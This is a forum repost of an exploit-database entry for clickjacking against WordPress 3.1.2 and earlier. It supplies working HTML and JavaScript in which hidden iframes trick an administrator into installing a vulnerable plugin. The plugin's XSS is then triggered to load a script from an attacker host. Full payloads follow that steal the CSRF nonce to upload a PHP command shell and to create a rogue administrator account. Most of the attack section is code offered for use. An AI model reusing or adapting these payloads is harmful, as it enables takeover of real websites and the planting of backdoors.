Wubi Posted July 27, 2012 Report Posted July 27, 2012 Wordpress =< 3.1.2 Clickjacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcodeExploit Title: Wordpress =< 3.1.2 Clickjacking Exploit 0dayAuthor: Caddy-DzFacebook Page: Algerian CA | FacebookHome : ?????? ?????? ??????E-mail: islam_babia@hotmail.com Category:: webappsGoogle Dork: "powered by wordpress"Security Risk: criticalTested on: Windows Seven Edition Integral / French#PS: No Protection of clickjacking in WordPress 3.1.2 and earlier1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=00 _ __ __ __ 11 /' \ __ /'__`\ /\ \__ /'__`\ 00 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 11 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 00 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 11 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 00 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 11 \ \____/ >> Exploit database separated by exploit 00 \/___/ type (local, remote, DoS, etc.) 11 10 [+] Site : 1337day.com 01 [+] Support e-mail : submit[at]1337day.com 10 01 ######################################### 10 I'm Caddy-dz member from Inj3ct0r Team 11 ######################################### 00-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1##### Exploit Title: Wordpress =< 3.1.2 Clickjacking Exploit 0day# Author: Caddy-Dz# Facebook Page: www.facebook.com/Algerian.Cyber.Army# Home : http://quran4you.eb2a.com# E-mail: islam_babia@hotmail.com # Category:: webapps# Google Dork: "powered by wordpress"# Security Risk: critical# Tested on: Windows Seven Edition Integral / French#####PS: No Protection of clickjacking in WordPress 3.1.2 and earlierExploit Process :1- Lure WordPress admin to a webpage : A clickjacking page with an invisible Plugin Install webpage from their own WordPress admin console on top of a visible dummy page2- Get them to click : They can’t see that they’re clicking an ?Install Now? button3- Install Vulnerable Plugin : They have installed SlidePress, a vulnerable plugin4- Detect Click Happened : Using onloaded="function()"5- Exploit Vulnerable Plugin : Exploit Cross Site Scripting in SlidePress6- Install Backdoor : Upload a shell as a plugin =)How does Plugin installation work?-A ZIP archive gets unpacked into http://victim.com/wp-content/plugins/-Installed but not activated-The Install Now button is in an iframe pointing to the WordPress admin console-The Admin users browser automatically authenticates with session cookies. The Admin must be logged in.# CJ V1 Exploit :=================<html> <head><title>Clickjack Exploit for WordPress v1</title></head><body> <style> #outerdiv { width:100px; height:30px; overflow:hidden; position:absolute; top:113px; left:335px; z-index:10; opacity:0; } #inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; } #para { width:650px; } </style> <h1>WordPress Clickjack Exploit v1</h1> <p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi. <a href="#">read more</a> </p> <div id="outerdiv"> <iframe id="inneriframe" scrolling="no" src="http://wordpress/wp-admin/plugin-install.php? tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height= 581"> wordpress </iframe> </div>PS: How do I stop redirecting after installing the plugin?-An iframe within an iframe-The inner frame which loads the Plugin webpage is named _parent<iframe id="innerframe" class="innerframe" scrolling= "no" src="data:text/html;charset=utf-8, ---snip--- <iframe name='_parent' scrolling='no' src='http://wordpress/wp-admin/plugin-install.php... '></iframe>"></iframe>PS: How to leverage the power to install an arbitrary plugin?* Find a vulnerable plugin- For exemple SlidePress is vulnerable to Reflected Cross Site Scripting (XSS)-Vulnerable when installed but not activated so only one click is required.* Proof of concept exploit :||>> http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1 &sspHeight=</script><script>alert(document.cookie)</script>&sspGalleryId=1-Injects JavaScript into a webpage-Can add an admin user or upload a backdoor* How do I automatically start XSS after the Plugin installs?-I need to detect when the user clicks-Use the load method of the iframe-1st load is the page load, 2nd load is the stolen click||>> function frameloaded() { load_count=load_count+1; if (load_count==2) { # exploit time ex(); } } ---snip--- <iframe class='attacksite' onload='frameloaded()Upon the 2nd frame load, ex() is called to perform the XSS attack-Stage2 is loaded with the SlidePress page which contains a XSS vulnerability-The XSS payload is stored at http://hax0r/x2.js||>> function ex() { top.document.getElementById('stage2').src='http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3'+'C/script%3E'+'%3'+'Cscript%20src=http://hax0r/x2.js?i='+Math.random()+'%3E%3'+'C/script%3E%3'+'Cnos'+'cript%3E&sspGalleryId=1&wp_path=/&a=></if'+'rame>'; } ---snip---- <iframe id="stage2"></iframe>* exploit source code :=======================#outerdiv { width:100px; height:30px; overflow:hidden; position:absolute;top:135px; left:445px; z-index:10; opacity:0; }.stage2 { opacity:0; }#para { width:600px; }.clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; }</style><h1>WordPress Clickjack Exploit v1</h1> <p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p><div class='clickjack'><a href='#'>read more</a></div><div id="outerdiv" ><iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8,— snip—"> </iframe> </div> <iframe class='stage2' style='height:0px;width:0px;' id='stage2'> </iframe><iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8,<style> .inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; }</style><script>var load_count=0;function frameloaded() { load_count=load_count+1; if (load_count==2) { ex(); }} function ex() { top.document.getElementById('stage2').src='http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3'+'C/script%3E'+'%3'+'Cscript%20src=http://hax0r/x2.js?i='+Math.random()+'%3E%3'+'C/script%3E%3'+'Cnos'+'cript%3E&sspGalleryId=1&wp_path=/&a=></if'+'rame>'; }</script> <iframe id='inneriframe' class='inneriframe' onload='frameloaded();' name='_parent' scrolling='no' src='http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=slidepress&TB_iframe=true&width=640&height=581'> </iframe> "></iframe>* How do I upload a backdoor with SlidePress’s Cross Site Scripting?* Use JavaScript to force the admin’s browser to: -Use SlidePress XSS to call a payload script on another website <script src=?http://hax0r/x2.js?> -Get the CSRF wpnonce token from the Update page using XMLHttpRequest() -Upload a Plugin using XMLHttpRequest.sendAsBinary which unpacks a backdoor to http://wordpress/wp-content/plugins/shell/shell.php[*] Payload to upload PHP Shell :=================================// x2.js payload to upload PHP shell to wordpress. /wp-content/plugins/shell/shell.php?cmd=lspath_to_wp = "/";xmlhttp = new XMLHttpRequest();xmlhttp.open("GET",path_to_wp + "/wp-admin/plugin-install.php?tab=upload",true);xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4) { response=xmlhttp.responseText; nonce=response.split('hidden" id="_wpnonce')[1]; nonce=nonce.split('"')[4]; xmlhttp.open("POST", path_to_wp + "/wp-admin/update.php?action=upload-plugin",true);xmlhttp.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------304661183327760");// shell.zip contains shell.php which is <? passthru($_REQUEST['cmd']); ?>post_data="-----------------------------304661183327760\r\n"+"Content-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n"+ nonce + "\r\n"+"-----------------------------304661183327760\r\n"+"Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n"+ path_to_wp + "/wp-admin/plugin-install.php?tab=upload\r\n"+ "-----------------------------304661183327760\r\n"+ "Content-Disposition: form-data; name=\"pluginzip\";\r\n"+ "filename=\"shell.zip\"\r\n"+"Content-Type: application/octet-stream\r\n\r\n";post_data=post_data+"\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x3b\x7a\xf6\x3c\x21\xbd\x50\x0a\x22\x00\x00…"; xmlhttp.setRequestHeader("Content-Length",post_data.length); xmlhttp.sendAsBinary(post_data); } } xmlhttp.send(null); [*] Payload to add admin :==========================// payload to add administrator userpath_to_wp = "/"; new_username="caddy-dz"; new_password="caddy-dz"; new_email="caddy-dz%40hotmail.fr"; // %40 for @xmlhttp = new XMLHttpRequest(); xmlhttp.open("GET",path_to_wp + "/wp-admin/user-new.php",true); xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4) { response=xmlhttp.responseText; nonce=response.split('hidden" id="_wpnonce')[1]; nonce=nonce.split('"')[4]; xmlhttp.open("POST", path_to_wp + "/wp-admin/user-new.php",true); xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); post_data="_wpnonce=" + nonce + "&action=adduser&user_login="+ new_username + "&first_name=&last_name=&email=" + new_email + "&url=&pass1=" + new_password + "&pass2=" + new_password + "&role=administrator&adduser=Add+User" xmlhttp.setRequestHeader("Content-Length",post_data.length); xmlhttp.send(post_data); } }xmlhttp.send(null);# Peace From Algeria ..//# Happy Ramadhan ..//## Greets To : ==============================================================================## The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates , ## TrOoN , jos_ali_joe , All Exploit-Id Team , (exploit-id.com) , (1337day.com) , ## ... And All Algerian Hax0rs #============================================================================================## 1337day.com [2012-07-27] Quote
